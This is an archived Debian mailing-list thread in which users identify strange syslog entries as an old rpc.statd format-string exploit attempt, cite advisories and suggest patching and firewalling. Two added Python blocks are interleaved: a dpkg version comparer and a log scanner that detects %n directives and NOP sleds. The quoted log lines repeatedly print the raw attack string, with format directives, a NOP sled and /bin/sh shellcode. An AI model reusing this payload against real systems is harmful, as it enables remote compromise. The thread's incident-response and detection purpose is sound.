Re: syslog messages
> I have checked this and I am running the recommended version
> nfs-common_0.1.9.1-1, also I don't see any obvious signs of access. Does
> this mean I don't need to worry about it or is there something else I
> should be doing?

Hi,

There is a bug in nfs-common_0.1.9.1 in Potato (#111990,
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=111990&archive=yes&repeatmerged=yes ).
This bug is NOT related to your problem (nor any security problem, except
putting garbage in logcheck mails), but you may be interested.

  dists/potato/main/binary-sparc/net/nfs-kernel-server_0.1.9.1-1.deb
  dists/potato/main/binary-sparc/net/nfs-common_0.1.9.1-1.deb
  dists/potato/main/binary-i386/net/nfs-kernel-server_0.1.9.1-1.deb
  dists/potato/main/binary-i386/net/nfs-common_0.1.9.1-1.deb

  pool/main/n/nfs-utils/nfs-common_0.1.9.1-1.potato1_i386.deb
  pool/main/n/nfs-utils/nfs-common_0.1.9.1-1.potato1_sparc.deb
  pool/main/n/nfs-utils/nfs-kernel-server_0.1.9.1-1.potato1_i386.deb
  pool/main/n/nfs-utils/nfs-kernel-server_0.1.9.1-1.potato1_sparc.deb

You should use nfs-common_0.1.9.1-1.potato1 to avoid this problem.

Can somebody explain to me why the replacement 0.1.9.1-1 -> 0.1.9.1-1.potato1
is not automatically done by apt? My /etc/apt/sources.list is:

  deb ftp://LOCAL_MIRROR/pub/debian stable main contrib non-free
  deb ftp://LOCAL_MIRROR/pub/debian-non-US stable/non-US main contrib non-free
  deb ftp://LOCAL_MIRROR/pub/debian-security stable/updates main contrib non-free

(LOCAL_MIRROR is one of our boxes mirroring ftp.fr.debian.org and
security.debian.org, just for our own needs).

-- 
Benoît Sibaud
R&D Engineer - France Telecom
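Whether apt treats 0.1.9.1-1.potato1 as an upgrade of 0.1.9.1-1 comes down to dpkg's version ordering. The following Python reimplementation of that ordering is an added example (not from the thread and not dpkg's own code; it follows the epoch / upstream / Debian-revision comparison rules) and shows that the potato1 revision does sort newer, so the version strings themselves would not block the upgrade.

```python
import re

def split_version(version):
    """Split 'epoch:upstream-revision' as dpkg does; epoch and revision are optional."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:                       # no '-': the whole string is the upstream part
        upstream, revision = revision, ""
    return epoch, upstream, revision

def _order(c):
    """dpkg's rank for a non-digit character: '~' < end of string < letters < others."""
    if c == "~":
        return -1
    if c == "":
        return 0
    if c.isalpha():
        return ord(c)
    return ord(c) + 256

def _verrevcmp(a, b):
    """Compare two fragments by alternating non-digit runs and numeric runs."""
    i = j = 0
    while i < len(a) or j < len(b):
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i] if i < len(a) else "")
            bc = _order(b[j] if j < len(b) else "")
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        da = re.match(r"\d*", a[i:]).group(0)
        db = re.match(r"\d*", b[j:]).group(0)
        i += len(da)
        j += len(db)
        na, nb = int(da or "0"), int(db or "0")   # leading zeros do not matter
        if na != nb:
            return na - nb
    return 0

def compare_versions(a, b):
    """Return -1, 0 or 1 as a is older than, equal to, or newer than b."""
    ea, ua, ra = split_version(a)
    eb, ub, rb = split_version(b)
    for x, y in ((ea, eb), (_verrevcmp(ua, ub), 0), (_verrevcmp(ra, rb), 0)):
        if x != y:
            return -1 if x < y else 1
    return 0

if __name__ == "__main__":
    installed, update = "0.1.9.1-1", "0.1.9.1-1.potato1"   # the two revisions in the thread
    rel = {-1: "is older than", 0: "equals", 1: "is newer than"}[compare_versions(installed, update)]
    print(installed, rel, update)
```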
Re: syslog messages
It's an exploit attempt. See http://www.debian.org/security/2000/2719a and
http://www.cert.org/advisories/CA-2000-17.html for more info.

On Thu, 21 Feb 2002, Marcel Welschbillig wrote:

> Hi,
>
> I'm getting these strange entries in my syslog file. Can anyone shed some
> light on what this means?
>
> Feb 21 14:03:35 jbeam
> Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together
> Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF
> BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7
> FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2
> 11F3B0^KCD\200B0^ACD\200E8\177FF
>
> Thanks in advance !
>
> Marcel
>
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Today's root password is brought to you by /dev/random
 .-.  | Steve Mickeler * Network Operations |
 +-+  | Neptune Internet Services |
 `-'  1024D/ACB58D4F = 0227 164B D680 9E13 9168 AE28 843F 57D7 ACB5 8D4F
Re: syslog messages
Just an attempt at a very old syslog exploit that has since been fix'd...

Jeremy

On Thu, Feb 21, 2002 at 09:02:13AM +0800, Marcel Welschbillig wrote:
> Hi,
>
> I'm getting these strange entries in my syslog file. Can anyone shed some
> light on what this means?
>
> Feb 21 14:03:35 jbeam
> Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together
> Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF
> BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7
> FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2
> 11F3B0^KCD\200B0^ACD\200E8\177FF
>
> Thanks in advance !
>
> Marcel
Re: syslog messages
Marcel Welschbillig wrote:
> Hi,
>
> I'm getting these strange entries in my syslog file. Can anyone shed some
> light on what this means?
>
> Feb 21 14:03:35 jbeam
> Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together
> Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF
> BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7
> FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220
> blah blah blah
>
> Thanks in advance !
>
> Marcel

Something along the lines of an old statd exploit. I believe this DSA [1] is
the one that covers it, and also this CERT Advisory [2]. I would personally
believe that the attack was unsuccessful, since it did write it to the log
(rather than crash and give the attacker a shell), but the CERT advisory
leads me to think otherwise. Check your version of nfs, 0.1.9.1-1 or better
should be fixed.

[1] http://www.debian.org/security/2000/2719a
[2] http://www.cert.org/advisories/CA-2000-17.html

Hope I have helped.

- Will Wesley, CCNA

Furious activity is no substitute for understanding. -- H.H. Williams
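The rpc.statd entry quoted above is the kind of line a log-scanning rule can flag on its own: a hostname argument should never contain printf directives such as %n or %8x, nor a run of \220 (syslogd's octal rendering of the 0x90 byte). The following Python scanner is an added example, not code from the thread or from any Debian package; its sample log lines are constructed, modelled on the excerpt above, with the NOP run shortened.

```python
import re

# Constructed sample log, modelled on the syslog excerpt quoted in the thread
# (host "jbeam", rpc.statd pid 198). The hostile line is shortened: the real
# one carried a far longer run of \220, syslogd's octal rendering of 0x90.
NOP_RUN = "\\220" * 12   # twelve logged NOP bytes; the real line had hundreds
SAMPLE_LOG = (
    "Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together\n"
    "Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for "
    "^XF7FFBF^XF7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n" + NOP_RUN + "\n"
    "Feb 21 14:05:01 jbeam /sbin/rpc.statd[198]: gethostbyname error for nosuchhost.example.net\n"
)

# "Mon DD HH:MM:SS host /sbin/rpc.statd[pid]: gethostbyname error for <arg>"
STATD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"/sbin/rpc\.statd\[(?P<pid>\d+)\]: gethostbyname error for (?P<arg>.*)$"
)
WRITE_DIRECTIVE_RE = re.compile(r"%\d*n")  # %n writes to memory; never in a hostname
PAD_DIRECTIVE_RE = re.compile(r"%\d*x")    # %8x, %236x: stack reads / width padding
NOP_ESCAPE_RE = re.compile(r"(?:\\220)+")  # consecutive 0x90 bytes as logged by syslogd
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

def analyse_arg(arg):
    """Judge the text rpc.statd failed to resolve; list what is wrong with it."""
    n_writes = len(WRITE_DIRECTIVE_RE.findall(arg))
    n_pads = len(PAD_DIRECTIVE_RE.findall(arg))
    longest_nop = max((len(m.group(0)) // 4 for m in NOP_ESCAPE_RE.finditer(arg)), default=0)
    indicators = []
    if n_writes:
        indicators.append(f"{n_writes} %n directive(s)")
    if n_pads:
        indicators.append(f"{n_pads} %x directive(s)")
    if longest_nop >= 8:
        indicators.append(f"NOP run of {longest_nop} bytes")
    if n_writes:
        verdict = "format-string attack"
    elif indicators or not HOSTNAME_RE.match(arg):
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": indicators}

def scan_syslog(text):
    """Return one finding per rpc.statd gethostbyname line that is not benign."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = STATD_RE.match(line)
        if not m:
            continue
        result = analyse_arg(m.group("arg"))
        if result["verdict"] != "benign":
            findings.append({"line": lineno, "ts": m.group("ts"), "host": m.group("host"),
                             "pid": int(m.group("pid")), **result})
    return findings

if __name__ == "__main__":
    for f in scan_syslog(SAMPLE_LOG):
        print(f"line {f['line']} {f['ts']} {f['host']} rpc.statd[{f['pid']}]: "
              f"{f['verdict']} ({', '.join(f['indicators'])})")
```

A rule like this only tells you an attempt was logged; as Will notes, whether it succeeded has to be settled by checking the package version and the host itself.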
Re: syslog messages
I have checked this and I am running the recommended version
nfs-common_0.1.9.1-1, also I don't see any obvious signs of access. Does this
mean I don't need to worry about it or is there something else I should be
doing?

Marcel

Steve Mickeler wrote:
> It's an exploit attempt. See http://www.debian.org/security/2000/2719a and
> http://www.cert.org/advisories/CA-2000-17.html for more info.
>
> On Thu, 21 Feb 2002, Marcel Welschbillig wrote:
>
> > Hi,
> >
> > I'm getting these strange entries in my syslog file. Can anyone shed some
> > light on what this means?
> >
> > Feb 21 14:03:35 jbeam
> > Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together
> > Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF
> > BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7
> > FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2
> > 11F3B0^KCD\200B0^ACD\200E8\177FF
> >
> > Thanks in advance !
> >
> > Marcel
>
> Today's root password is brought to you by /dev/random
>  .-.  | Steve Mickeler * Network Operations |
>  +-+  | Neptune Internet Services |
>  `-'  1024D/ACB58D4F = 0227 164B D680 9E13 9168 AE28 843F 57D7 ACB5 8D4F
Re: syslog messages
On Thu, 21 Feb 2002, Marcel Welschbillig wrote:

> I have checked this and I am running the recommended version
> nfs-common_0.1.9.1-1, also I don't see any obvious signs of access. Does
> this mean I don't need to worry about it or is there something else I
> should be doing?

You should only allow necessary connections in your firewalling setup and
deny everything else.

Alex

-- 
Life is what happens to you while you're busy making other plans.
    John Lennon